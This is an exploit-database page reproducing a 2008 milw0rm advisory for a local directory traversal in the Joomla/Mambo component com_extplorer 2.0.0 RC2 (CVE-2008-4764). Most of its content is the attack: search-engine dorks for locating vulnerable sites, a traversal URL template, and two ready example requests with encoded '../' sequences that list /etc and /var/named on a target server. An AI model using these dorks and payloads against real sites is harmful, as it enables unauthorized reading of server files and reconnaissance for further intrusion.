[] NeoSense
E X P L O I T S
title author type platform port cve id

Joomla! Component com_extplorer 2.0.0 RC2 - Local Directory Traversal

Author: Houssamix
type: webapps
platform: php
port: 
date_added: 2008-04-12 
date_updated: 2016-11-24 
verified: 1 
codes: OSVDB-49400;CVE-2008-4764 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comcom_extplorer_2.0.0_RC2.zip
--------------------------------------------------------------------------------------------------------------
----- H-T Team [ HouSSaMix + ToXiC350 ] from MoroCCo ---------------------------------------------------------
--------------------------------------------------------------------------------------------------------------

= Author : HouSSaMix
= Script : Joomla and Mambo Component com_extplorer
= version : <= 2.0.0 RC2
= Download : http://joomlacode.org/gf/download/frsrelease/6717/21992/com_extplorer_2.0.0_RC2.zip

= Dork1 : inurl:index.php?option=com_extplorer
= Dork2 : powered by extplorer


= BUG  :  Local Directory Traversal

exploit => target.com/path/index.php?option=com_extplorer&action=show_error&dir=../../[directory]

example :
  site.com/joomla/index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc
  site.com/joomla/index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2F%2Fvar%2Fnamed

= greetz :	V4 Team - Jiki Team - Gold_M - HaCkeR_EgY - RoMaNcYxHaCkEr and all muslims Hackers

=================================================================================================================

# milw0rm.com [2008-04-13]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.